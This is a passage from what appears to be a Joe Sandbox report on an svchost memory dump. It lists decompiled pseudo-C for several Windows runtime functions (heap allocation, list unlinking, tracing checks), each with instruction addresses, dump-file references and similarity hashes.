				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3117b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0306F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03047D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03069AE0();
					_t24 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                        0x030a7799
                        0x030a779a
                        0x030a779b
                        0x030a77a3
                        0x030a77ab
                        0x030a77ae
                        0x030a77b1
                        0x030a77b1
                        0x030a77bf
                        0x030a77c4
                        0x030a77c8
                        0x030a77ce
                        0x030a77d4
                        0x030a77e0
                        0x030a77e0
                        0x030a77d6
                        0x030a77d6
                        0x030a77de
                        0x00000000
                        0x00000000
                        0x030a77de
                        0x030a77e5
                        0x030a77f0
                        0x030a77f3
                        0x030a77f6
                        0x030a77fd
                        0x030a7800
                        0x030a780c
                        0x030a7818
                        0x030a782b
                        0x030a781a
                        0x030a7823
                        0x030a7823
                        0x030a7830
                        0x030a7831
                        0x030a7838
                        0x030a783d
                        0x030a783e
                        0x030a784f
                        0x030a784f
                        0x030a785a

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10557f0fd505df26063ac33d8558c29116ee7388f41b2a111ec1ac4b7b4c55eb
                        • Instruction ID: 3bc7893e8e6097e0ec6046f31a7a61130d8ae7ff2ed48b832b3db6cfd3f2ec71
                        • Opcode Fuzzy Hash: 10557f0fd505df26063ac33d8558c29116ee7388f41b2a111ec1ac4b7b4c55eb
                        • Instruction Fuzzy Hash: 0E219F76501A04ABC725DFA9D880EABB7E9EF88B40F144569E50ACB750D734E900CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304AE73 Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E0304AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03047D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03047D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03047D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03047D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E030A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                        0x0304ae78
                        0x0304ae7c
                        0x0304ae7e
                        0x0304ae81
                        0x0304ae86
                        0x0304ae8d
                        0x03092691
                        0x0304ae93
                        0x0304ae93
                        0x0304ae93
                        0x0304ae98
                        0x0304ae9d
                        0x030926a2
                        0x030926b4
                        0x030926a4
                        0x030926ad
                        0x030926ad
                        0x030926b9
                        0x00000000
                        0x030926bb
                        0x00000000
                        0x030926bb
                        0x0304aea3
                        0x0304aea3
                        0x0304aea3
                        0x0304aeaa
                        0x030926c0
                        0x030926c9
                        0x030926c9
                        0x0304aeb3
                        0x030926d4
                        0x030926e1
                        0x00000000
                        0x00000000
                        0x030926e7
                        0x030926ee
                        0x030926f0
                        0x030926f9
                        0x030926f9
                        0x03092702
                        0x03092708
                        0x03092708
                        0x0309270b
                        0x0309270f
                        0x03092711
                        0x03092711
                        0x03092725
                        0x03092725
                        0x00000000
                        0x0304aeb9
                        0x0304aeb9
                        0x0304aebf
                        0x0304aebf
                        0x0304aeb3

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: 850f8451ba8c0626bf494b47d1aeacd795ba4b26f9065c693fe7c5316aa5d87d
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 3521D4B1A07684AFEB15DB69C944B6677ECEF44640F0D08F1DD048B692D734DD40D6A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305FD9B Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E0305FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E030376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                        0x0305fd9b
                        0x0305fda0
                        0x0305fda1
                        0x0305fdab
                        0x0305fdad
                        0x0305fdb0
                        0x0305fdb8
                        0x0305fe0f
                        0x0305fde6
                        0x0305fde9
                        0x0305fdec
                        0x0309c0c0
                        0x0305fdfe
                        0x0305fe06
                        0x0305fe06
                        0x0309c0c8
                        0x0305fe2d
                        0x0305fe2d
                        0x00000000
                        0x0305fe2d
                        0x0309c0d1
                        0x0309c0e0
                        0x0309c0e5
                        0x0309c0e5
                        0x0309c0e8
                        0x00000000
                        0x0309c0e8
                        0x0305fdf4
                        0x00000000
                        0x00000000
                        0x0305fdf6
                        0x0305fdfa
                        0x0305fe1a
                        0x0305fe1f
                        0x0305fe1f
                        0x0305fdfc
                        0x00000000
                        0x0305fdfc
                        0x0305fdcc
                        0x0305fdd0
                        0x0305fe26
                        0x00000000
                        0x0305fe26
                        0x0305fdd8
                        0x0305fddb
                        0x0305fddd
                        0x0305fde0
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: 651d6bf9442e2e744cdea7d90b9f91b14d89a0326eca2fbddeb3414fde4867dc
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: E3218E76A42642DFD731CF09C640F67F7EAEB94A10F29857EE9468B610D7389D00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305B390 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E0305B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03042280(_t12, 0x3118608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E030600C2(0x3118608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                        0x0305b395
                        0x0305b3a2
                        0x0305b3a5
                        0x0305b3aa
                        0x0305b3b2
                        0x0305b3ba
                        0x0305b3bd
                        0x0305b3c0
                        0x0305b3c4
                        0x0305b3c9
                        0x0309a3e9
                        0x0309a3ed
                        0x0309a3f0
                        0x0309a3ff
                        0x0309a403
                        0x0309a409
                        0x00000000
                        0x00000000
                        0x0309a40b
                        0x0309a40b
                        0x0309a40f
                        0x0309a415
                        0x0309a423
                        0x0309a423
                        0x0309a415
                        0x0305b3d1
                        0x0305b3e8
                        0x0305b3e8
                        0x0305b3d9

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4090e4ea31361c6421b258c96acdcfec22b33fd28a67d55d742a8c91ca95cda
                        • Instruction ID: 2e6faaf73028458bf11e38ed09d06362a7e07105cdd9357b1707ef550ca2a586
                        • Opcode Fuzzy Hash: b4090e4ea31361c6421b258c96acdcfec22b33fd28a67d55d742a8c91ca95cda
                        • Instruction Fuzzy Hash: 6A116F373171149FCB18DA148E4156F72AAEBC9770B28413DED16EB380CA316C02C694
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03029240 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E03029240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x30ff708);
				E0307D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E030695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E030695D0();
				_t33 =  *0x31184c4; // 0x0
				L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x31184c4; // 0x0
				L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x31184c4; // 0x0
				E03042280(L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x31186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E030695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E030695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03029325();
					_t50 =  *0x31184c4; // 0x0
					return E0307D0D1(L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                        0x03029240
                        0x03029242
                        0x03029247
                        0x0302924c
                        0x0302924e
                        0x03029255
                        0x03029257
                        0x0302925a
                        0x0302925f
                        0x0302925f
                        0x03029266
                        0x03029271
                        0x03029276
                        0x03029279
                        0x0302927e
                        0x03029295
                        0x0302929a
                        0x030292b1
                        0x030292b6
                        0x030292d7
                        0x030292dc
                        0x030292e0
                        0x030292e6
                        0x030292e8
                        0x030292ee
                        0x03029332
                        0x03029333
                        0x03029337
                        0x03029338
                        0x0302933a
                        0x0302933a
                        0x0302933d
                        0x03029342
                        0x03029342
                        0x03029345
                        0x03029349
                        0x0302934e
                        0x03029352
                        0x03029357
                        0x030292f4
                        0x030292f4
                        0x030292f6
                        0x030292f9
                        0x03029300
                        0x03029306
                        0x03029324
                        0x03029324

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6cfdb4296c525f8c404e22028bdee01bde5125c9ab60de2c41b22aeb11f2c381
                        • Instruction ID: a679f1695364b3c31b1b3e02101fbb64c194091ed3641695d53c59c7fe43ae12
                        • Opcode Fuzzy Hash: 6cfdb4296c525f8c404e22028bdee01bde5125c9ab60de2c41b22aeb11f2c381
                        • Instruction Fuzzy Hash: F1217F76542700DFC725EF28CA40F9AB7F9FF48704F0445A8E1098BAA1CB34E951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030B4257 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E030B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x31008d0);
				E0307D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E030B41E8(__ebx, __edi, __ecx, _t39);
				E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x31187e4;
					_t18 =  *0x31187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3115cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x31187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x31187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03027055(_t31 + 0xfffffff8);
								_t24 =  *0x31187e0; // 0x0
								_t18 = _t24 - 1;
								 *0x31187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3115cd0;
				if( *0x3115cd0 <= 0) {
					L03027055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x31187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x31187e8 = _t30;
						 *0x31187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0307D0D1(L030B4320());
			}















                        0x030b4257
                        0x030b4257
                        0x030b4257
                        0x030b4259
                        0x030b425e
                        0x030b4263
                        0x030b4265
                        0x030b4273
                        0x030b4278
                        0x030b427c
                        0x030b427f
                        0x030b4281
                        0x030b4287
                        0x030b42d7
                        0x030b42d7
                        0x030b42da
                        0x030b428d
                        0x030b428d
                        0x030b428f
                        0x030b4292
                        0x030b4297
                        0x030b429c
                        0x030b42a0
                        0x030b42a6
                        0x030b42a8
                        0x030b42ae
                        0x030b42b3
                        0x00000000
                        0x030b42ba
                        0x030b42ba
                        0x030b42bf
                        0x030b42c5
                        0x030b42ca
                        0x030b42cf
                        0x030b42d0
                        0x00000000
                        0x030b42d0
                        0x030b42b3
                        0x00000000
                        0x030b42a6
                        0x030b429c
                        0x030b42dc
                        0x030b42dc
                        0x030b42e3
                        0x030b4309
                        0x030b42e5
                        0x030b42e5
                        0x030b42e8
                        0x030b42ee
                        0x030b42f0
                        0x00000000
                        0x030b42f2
                        0x030b42f2
                        0x030b42f4
                        0x030b42f7
                        0x030b42f9
                        0x030b4300
                        0x030b4300
                        0x030b42f0
                        0x030b430e
                        0x030b431f

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b59af7537fc0f8e981b7c8776a40b729117290b6661f8a0a59a3b4d021edb6fc
                        • Instruction ID: d227a0c8063efd65feac7a6aac12955cb7b70632aaf593ab7b66a044b36a53d9
                        • Opcode Fuzzy Hash: b59af7537fc0f8e981b7c8776a40b729117290b6661f8a0a59a3b4d021edb6fc
                        • Instruction Fuzzy Hash: BA218B75902720CFC759EF25D2406D8BBF5FB89314B98C2AAC1958B296D730C681CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03052397 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 34%
                        			E03052397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x311848c != 0) {
					L0304FAD0(0x3118610);
					if( *0x311848c == 0) {
						E0304FA00(0x3118610, _t19, _t27, 0x3118610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03052581(0x3118610, 0x30050a0, _t26, _t27, _t28);
						E0304FA00(0x3118610, 0x30050a0, _t27, 0x3118610);
					}
				} else {
					L1:
					_t11 =  *0x3118614; // 0x0
					if(_t11 == 0) {
						_t11 = E03064886(0x3001088, 1, 0x3118614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03052581(0x3118610, (_t11 << 4) + 0x3005070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                        0x030523b0
                        0x030523b6
                        0x03052409
                        0x03052415
                        0x03095ae9
                        0x00000000
                        0x0305241b
                        0x0305241b
                        0x0305241d
                        0x03052427
                        0x0305242e
                        0x03052430
                        0x03052430
                        0x030523b8
                        0x030523b8
                        0x030523b8
                        0x030523bf
                        0x030523fc
                        0x030523fc
                        0x030523c1
                        0x030523c3
                        0x030523d0
                        0x030523d8
                        0x030523d8
                        0x030523dc
                        0x030523de
                        0x030523e1
                        0x030523e1
                        0x030523ec

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9764d18240b4b893ac526819b8f46cce1854fdacdeb221fcbf0579cce081f092
                        • Instruction ID: 18311c1cdbfd1bda9c405d8b9820896761151a4e0c1a5dac126c02907db66d76
                        • Opcode Fuzzy Hash: 9764d18240b4b893ac526819b8f46cce1854fdacdeb221fcbf0579cce081f092
                        • Instruction Fuzzy Hash: C211F2717063045BE734EA29DD84B5BB6DDEFD4650F188826FD01AB191CB70D841C758
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A46A7 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E030A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0306F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0305D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L030477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                        0x030a46b7
                        0x030a46ba
                        0x030a46c5
                        0x030a46c8
                        0x030a46d0
                        0x030a46d4
                        0x030a46e6
                        0x030a46e9
                        0x030a46f4
                        0x030a46ff
                        0x030a4705
                        0x030a4706
                        0x030a470c
                        0x030a4713
                        0x030a471b
                        0x030a4723
                        0x030a4725
                        0x030a46d6
                        0x030a46d9
                        0x030a46db
                        0x030a46db
                        0x030a4732

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: 59fd55b72ef24a40995fc5adb3cc42b02686606c1e0b3cdf3a501c916b0cd916
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: 5C112576505208BBC701DF5DE8808BEB7B9EFD5300F1080AAF944CB350DA718E51C3A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302C962 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        C-Code - Quality: 42%
                        			E0302C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x311d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0303EEF0(0x31170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E030AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0303EB70(_t29, 0x31170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0306B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E030AF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x31170c0; // 0x0
					while(_t38 != 0x31170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
